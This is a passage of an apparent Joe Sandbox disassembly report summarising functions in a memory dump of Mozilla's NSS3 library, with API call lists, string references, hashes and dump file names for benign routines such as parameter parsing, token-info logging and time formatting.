PL_strcasecmp.NSS3(00000000,timeout), ref: 68D94A81
free.MOZGLUE(00000000), ref: 68D94AAB
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 68D94ABE
PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 68D94ADC
free.MOZGLUE(00000000), ref: 68D94B17
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 68D94B33

Part of subcall function 68D94120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 68D9413D
Part of subcall function 68D94120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 68D94162
Part of subcall function 68D94120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 68D9416B
Part of subcall function 68D94120: PL_strncasecmp.NSS3(68D94232,?,00000001), ref: 68D94187
Part of subcall function 68D94120: NSSUTIL_ArgSkipParameter.NSS3(68D94232), ref: 68D941A0
Part of subcall function 68D94120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 68D941B4
Part of subcall function 68D94120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 68D941CC
Part of subcall function 68D94120: NSSUTIL_ArgFetchValue.NSS3(68D94232,?), ref: 68D94203

PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 68D94B53
free.MOZGLUE(00000000), ref: 68D94B94
free.MOZGLUE(?), ref: 68D94BA7
free.MOZGLUE(00000000), ref: 68D94BB7
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 68D94BC8

Strings

every, xrefs: 68D94A66
rootFlags, xrefs: 68D94AB9, 68D94B2E
askpw, xrefs: 68D94A4A
timeout, xrefs: 68D94A38, 68D94A7B
@uU~/, xrefs: 68D9484F
slotFlags, xrefs: 68D94A22
hasRootCerts, xrefs: 68D94AD6
hasRootTrust, xrefs: 68D94B4D

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
String ID: @uU~/$askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
API String ID: 3791087267-3960793588
Opcode ID: 0b301a95840396a9b3119d0e98c1d6fb40ddd869f4fc3b248934594df61b3aea
Instruction ID: 752b51f28aaa937326bfb6e3d0d9699c720847a7c278bd117219f42859ca7eec
Opcode Fuzzy Hash: 0b301a95840396a9b3119d0e98c1d6fb40ddd869f4fc3b248934594df61b3aea
Instruction Fuzzy Hash: 19C1D9B5E442559FDF208F689C40BBF7BA6AF07298F840069DCB9A7242E731D914C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 68D86C00 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,68D31C6F,00000000,00000004,?,?), ref: 68D86C3F

Part of subcall function 68DDC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 68DDC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,68D31C6F,00000000,00000004,?,?), ref: 68D86C60
PR_ExplodeTime.NSS3(00000000,68D31C6F,?,?,?,?,?,00000000,00000000,00000000,?,68D31C6F,00000000,00000004,?,?), ref: 68D86C94

Strings

gfff, xrefs: 68D86D66
gfff, xrefs: 68D86CF5
gfff, xrefs: 68D86D9C
@uU~/, xrefs: 68D86C0F
gfff, xrefs: 68D86D30
gfff, xrefs: 68D86CFD

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: @uU~/$gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-2772308113
Opcode ID: d98c4a9ad1d3767d1c991e059158a304bd15760aefd897fbd49379a926d1c49f
Instruction ID: e09fae3c8f995228e7f68ef4b720687516bcf33cf0b1ce893d33896b51186d68
Opcode Fuzzy Hash: d98c4a9ad1d3767d1c991e059158a304bd15760aefd897fbd49379a926d1c49f
Instruction Fuzzy Hash: 8E513B76B115494FC718CEADEC526EEBBDAABA4310F48C23AE441DB781E638D902C751

Uniqueness

Uniqueness Score: -1.00%

Function 68DC68E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 68DC68FC
PR_EnterMonitor.NSS3 ref: 68DC6924

Part of subcall function 68DF9090: TlsGetValue.KERNEL32 ref: 68DF90AB
Part of subcall function 68DF9090: TlsGetValue.KERNEL32 ref: 68DF90C9
Part of subcall function 68DF9090: EnterCriticalSection.KERNEL32 ref: 68DF90E5
Part of subcall function 68DF9090: TlsGetValue.KERNEL32 ref: 68DF9116
Part of subcall function 68DF9090: LeaveCriticalSection.KERNEL32 ref: 68DF913F

Part of subcall function 68D207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207AD
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207CD
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207D6
Part of subcall function 68D207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,68CB204A), ref: 68D207E4
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,68CB204A), ref: 68D20864
Part of subcall function 68D207A0: calloc.MOZGLUE(00000001,0000002C), ref: 68D20880
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,68CB204A), ref: 68D208CB
Part of subcall function 68D207A0: TlsGetValue.KERNEL32(?,?,68CB204A), ref: 68D208D7
Part of subcall function 68D207A0: TlsGetValue.KERNEL32(?,?,68CB204A), ref: 68D208FB

PR_EnterMonitor.NSS3 ref: 68DC693E
TlsGetValue.KERNEL32 ref: 68DC6977
TlsGetValue.KERNEL32 ref: 68DC69B8
PR_ExitMonitor.NSS3 ref: 68DC6B1E
PR_ExitMonitor.NSS3 ref: 68DC6B39
TlsGetValue.KERNEL32 ref: 68DC6B62

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
String ID:
API String ID: 4003455268-0
Opcode ID: 844615e6e563f51cc33271f583d3a976b8404458b6c4bb07258fa77f929ea910
Instruction ID: a8409221ebb993f8627187aef41477fb1cd8093e0eca3329104471d3a3b14d25
Opcode Fuzzy Hash: 844615e6e563f51cc33271f583d3a976b8404458b6c4bb07258fa77f929ea910
Instruction Fuzzy Hash: 10915FB4658100CBDB50DF2DE48053D7F6BEB87384BE1829DDA844B219DB75D982CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 68DDC9E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187timeCOMMON

Download Yara Rule

APIs

PR_NormalizeTime.NSS3(00000000,?), ref: 68DDCEA5

Strings

@uU~/, xrefs: 68DDC9EF

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: NormalizeTime
String ID: @uU~/
API String ID: 1467309002-2989128320
Opcode ID: d221af4b9a662d2d8c1e11930b3080715d09882b75c0b3916bbe9554d642b2e0
Instruction ID: baab15f74f8a9ef6dd421a9c32bc8e75a02f7f3dd86dcbe637d4b7ccc087ad43
Opcode Fuzzy Hash: d221af4b9a662d2d8c1e11930b3080715d09882b75c0b3916bbe9554d642b2e0
Instruction Fuzzy Hash: 307151B1904741CFC704CF28C88062ABBE5FF89764F558A2DE4A9CB3A1E730D955CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 68E00C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bd87ed5dedc210614c2ebc3b4fb659bf79fd621089cc410fa2dc57e0bc0c213
Instruction ID: 382a7cb9f14cdd7f35be9b99a0c2847aed5e3510b49b07e39a5c12f36e4af1bc
Opcode Fuzzy Hash: 6bd87ed5dedc210614c2ebc3b4fb659bf79fd621089cc410fa2dc57e0bc0c213
Instruction Fuzzy Hash: 6A11A379604705DFDB10DF28C8D066A77A6FF86368F24846DD8298B301EB71E856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 68E409D0 Relevance: 63.3, APIs: 33, Strings: 3, Instructions: 275filetimethreadCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 68E40A22

Part of subcall function 68DF9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,68E40A27), ref: 68DF9DC6
Part of subcall function 68DF9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,68E40A27), ref: 68DF9DD1
Part of subcall function 68DF9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 68DF9DED

PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 68E40A35

Part of subcall function 68D23810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 68D2382A
Part of subcall function 68D23810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 68D23879

PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 68E40A66
PR_GetCurrentThread.NSS3 ref: 68E40A70
PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 68E40A9D
PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 68E40AC8
PR_vsmprintf.NSS3(?,?), ref: 68E40AE8
EnterCriticalSection.KERNEL32(?), ref: 68E40B19
OutputDebugStringA.KERNEL32(00000000), ref: 68E40B48
OutputDebugStringA.KERNEL32(?), ref: 68E40B88
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 68E40C36
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 68E40C45
memcpy.VCRUNTIME140(?,?,00000000), ref: 68E40C5D
_PR_MD_UNLOCK.NSS3(?), ref: 68E40C76
PR_LogFlush.NSS3 ref: 68E40C7E
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 68E40C8D
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 68E40C9C
OutputDebugStringA.KERNEL32(?), ref: 68E40CD1
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 68E40CEC
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 68E40CFB
OutputDebugStringA.KERNEL32(00000000), ref: 68E40D16
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 68E40D26
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 68E40D35
OutputDebugStringA.KERNEL32(0000000A), ref: 68E40D65
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 68E40D70
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 68E40D7E
_PR_MD_UNLOCK.NSS3(?), ref: 68E40D90
free.MOZGLUE(00000000), ref: 68E40D99

Strings

%ld[%p]: , xrefs: 68E40A96
%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - , xrefs: 68E40A5B
@uU~/, xrefs: 68E409DC

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: DebugOutputStringfflush$Timefwrite$Unothrow_t@std@@@__ehfuncinfo$??2@$R_snprintfSystem$CriticalCurrentEnterExplodeFileFlushR_vsmprintfR_vsnprintfSectionThreadfputcfreememcpy
String ID: %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - $%ld[%p]: $@uU~/
API String ID: 3820836880-1296515895
Opcode ID: e0cea9ff4772ef3e38e61d53375372faac4265e94f99397a51b6eeccd596a92d
Instruction ID: 9d0c8cceba7f5f312055c5344cdccc0dc36040cf33b82ab90b74edd6e7f34f76
Opcode Fuzzy Hash: e0cea9ff4772ef3e38e61d53375372faac4265e94f99397a51b6eeccd596a92d
Instruction Fuzzy Hash: 07A129B2940104DFDF119B64DC88BAD3B7CAF53318F5806A5F82D93382D7B99946CB61

Uniqueness

Uniqueness Score: -1.00%

Function 68D628A0 Relevance: 50.9, APIs: 12, Strings: 17, Instructions: 155COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetTokenInfo), ref: 68D628BD
PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 68D628EF

Part of subcall function 68E409D0: OutputDebugStringA.KERNEL32(?), ref: 68E40B88
Part of subcall function 68E409D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 68E40C5D
Part of subcall function 68E409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 68E40C8D
Part of subcall function 68E409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 68E40C9C
Part of subcall function 68E409D0: OutputDebugStringA.KERNEL32(?), ref: 68E40CD1
Part of subcall function 68E409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 68E40CEC
Part of subcall function 68E409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 68E40CFB
Part of subcall function 68E409D0: OutputDebugStringA.KERNEL32(00000000), ref: 68E40D16
Part of subcall function 68E409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 68E40D26
Part of subcall function 68E409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 68E40D35
Part of subcall function 68E409D0: OutputDebugStringA.KERNEL32(0000000A), ref: 68E40D65
Part of subcall function 68E409D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 68E40D70
Part of subcall function 68E409D0: _PR_MD_UNLOCK.NSS3(?), ref: 68E40D90
Part of subcall function 68E409D0: free.MOZGLUE(00000000), ref: 68E40D99

Part of subcall function 68D20F00: PR_GetPageSize.NSS3(68D20936,FFFFE8AE,?,68CB16B7,00000000,?,68D20936,00000000,?,68CB204A), ref: 68D20F1B
Part of subcall function 68D20F00: PR_NewLogModule.NSS3(clock,68D20936,FFFFE8AE,?,68CB16B7,00000000,?,68D20936,00000000,?,68CB204A), ref: 68D20F25

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 68D628D6

Part of subcall function 68E409D0: PR_Now.NSS3 ref: 68E40A22
Part of subcall function 68E409D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 68E40A35
Part of subcall function 68E409D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 68E40A66
Part of subcall function 68E409D0: PR_GetCurrentThread.NSS3 ref: 68E40A70
Part of subcall function 68E409D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 68E40A9D
Part of subcall function 68E409D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 68E40AC8
Part of subcall function 68E409D0: PR_vsmprintf.NSS3(?,?), ref: 68E40AE8
Part of subcall function 68E409D0: EnterCriticalSection.KERNEL32(?), ref: 68E40B19
Part of subcall function 68E409D0: OutputDebugStringA.KERNEL32(00000000), ref: 68E40B48
Part of subcall function 68E409D0: _PR_MD_UNLOCK.NSS3(?), ref: 68E40C76
Part of subcall function 68E409D0: PR_LogFlush.NSS3 ref: 68E40C7E

PR_LogPrint.NSS3( label = "%.32s",?), ref: 68D62963
PR_LogPrint.NSS3( manufacturerID = "%.32s",?), ref: 68D62983
PR_LogPrint.NSS3( model = "%.16s",?), ref: 68D629A3
PR_LogPrint.NSS3( serial = "%.16s",?), ref: 68D629C3
PR_LogPrint.NSS3( flags = %s %s %s %s,CKF_RNG,CKF_WRITE_PROTECTED,CKF_LOGIN_REQUIRED,?), ref: 68D62A26
PR_LogPrint.NSS3( maxSessions = %u, Sessions = %u,?,?), ref: 68D62A48
PR_LogPrint.NSS3( maxRwSessions = %u, RwSessions = %u,?,?), ref: 68D62A66
PR_LogPrint.NSS3( hardware version: %d.%d,?,?), ref: 68D62A8E
PR_LogPrint.NSS3( firmware version: %d.%d,?,?), ref: 68D62AB6

Strings

CKF_LOGIN_REQUIRED, xrefs: 68D629F3, 68D62A1E
CKF_USER_PIN_INIT, xrefs: 68D629E5
label = "%.32s", xrefs: 68D6295E
CKF_RNG, xrefs: 68D62A13, 68D62A20
pInfo = 0x%p, xrefs: 68D628EA
CKF_WRITE_PROTECTED, xrefs: 68D629FE, 68D62A1F
nh, xrefs: 68D6290B, 68D62937
C_GetTokenInfo, xrefs: 68D628B8
hardware version: %d.%d, xrefs: 68D62A89
maxSessions = %u, Sessions = %u, xrefs: 68D62A43
maxRwSessions = %u, RwSessions = %u, xrefs: 68D62A61
slotID = 0x%x, xrefs: 68D628D1
serial = "%.16s", xrefs: 68D629BE
manufacturerID = "%.32s", xrefs: 68D6297E
firmware version: %d.%d, xrefs: 68D62AB1
flags = %s %s %s %s, xrefs: 68D62A21
model = "%.16s", xrefs: 68D6299E

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Print$DebugOutputString$fflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushModulePageR_vsmprintfR_vsnprintfSectionSizeThreadTimefputcfreememcpy
String ID: firmware version: %d.%d$ flags = %s %s %s %s$ hardware version: %d.%d$ label = "%.32s"$ manufacturerID = "%.32s"$ maxRwSessions = %u, RwSessions = %u$ maxSessions = %u, Sessions = %u$ model = "%.16s"$ pInfo = 0x%p$ serial = "%.16s"$ slotID = 0x%x$CKF_LOGIN_REQUIRED$CKF_RNG$CKF_USER_PIN_INIT$CKF_WRITE_PROTECTED$C_GetTokenInfo$nh
API String ID: 2460313690-2216678344
Opcode ID: cd33845c3b157a2f8680c9ad2493bd77f0ff381f0193cd81c1c5985264ac45b2
Instruction ID: 1fdf78262b77c1afbd66e2d97ffb18bd5faf967f548b01f31de714c1cf62467a
Opcode Fuzzy Hash: cd33845c3b157a2f8680c9ad2493bd77f0ff381f0193cd81c1c5985264ac45b2
Instruction Fuzzy Hash: 9F5128B6440004EFEF118B41ED85A6D37A6AF8B26DFD480BAE9189B112EB71DC54CB71

Uniqueness

Uniqueness Score: -1.00%

Function 68D94C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,68D84F51,00000000), ref: 68D94C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,68D84F51,00000000), ref: 68D94C5B
PR_smprintf.NSS3(68E6AAF9,?,0000002F,?,?,?,00000000,00000000,?,68D84F51,00000000), ref: 68D94C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,68D84F51,00000000), ref: 68D94CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 68D94CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 68D94CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 68D94D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,68D84F51,00000000), ref: 68D94D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,68D84F51,00000000), ref: 68D94D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 68D94D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 68D94DA2
free.MOZGLUE(?), ref: 68D94DB9
free.MOZGLUE(00000000), ref: 68D94DCF

Strings

every, xrefs: 68D94CA1
rootFlags, xrefs: 68D94D47
ootT, xrefs: 68D94D1A
any, xrefs: 68D94C96
timeout, xrefs: 68D94C91
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 68D94D9D
slotFlags, xrefs: 68D94D34
rust, xrefs: 68D94D22
%s,%s, xrefs: 68D94C4B
0x%08lx=[%s %s], xrefs: 68D94D80

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 454a6029148526c80c42a7e2be8f716340c2a6c0941649c99d5bc44e037dd5e1
Instruction ID: 2db4dba3ac1d5437aa2c2f3592e80c0f38e902667678ba55d7125ee985700020
Opcode Fuzzy Hash: 454a6029148526c80c42a7e2be8f716340c2a6c0941649c99d5bc44e037dd5e1
Instruction Fuzzy Hash: 56417BF6900141ABDF219F14AC8467E366AAF93398F984264EC3A57302E735E954C7F3

Uniqueness

Uniqueness Score: -1.00%

Function 68D76CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 68D76910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 68D76943
Part of subcall function 68D76910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 68D76957
Part of subcall function 68D76910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 68D76972
Part of subcall function 68D76910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 68D76983
Part of subcall function 68D76910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 68D769AA
Part of subcall function 68D76910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 68D769BE
Part of subcall function 68D76910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 68D769D2
Part of subcall function 68D76910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 68D769DF
Part of subcall function 68D76910: NSSUTIL_ArgStrip.NSS3(?), ref: 68D76A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 68D76D8C
free.MOZGLUE(00000000), ref: 68D76DC5
free.MOZGLUE(?), ref: 68D76DD6
free.MOZGLUE(?), ref: 68D76DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 68D76E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 68D76E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 68D76E72
free.MOZGLUE(?), ref: 68D76EA7
free.MOZGLUE(?), ref: 68D76EC4
free.MOZGLUE(?), ref: 68D76ED5
free.MOZGLUE(00000000), ref: 68D76EE3
free.MOZGLUE(?), ref: 68D76EF4
free.MOZGLUE(?), ref: 68D76F08
free.MOZGLUE(00000000), ref: 68D76F35
free.MOZGLUE(?), ref: 68D76F44
free.MOZGLUE(?), ref: 68D76F5B
free.MOZGLUE(00000000), ref: 68D76F65

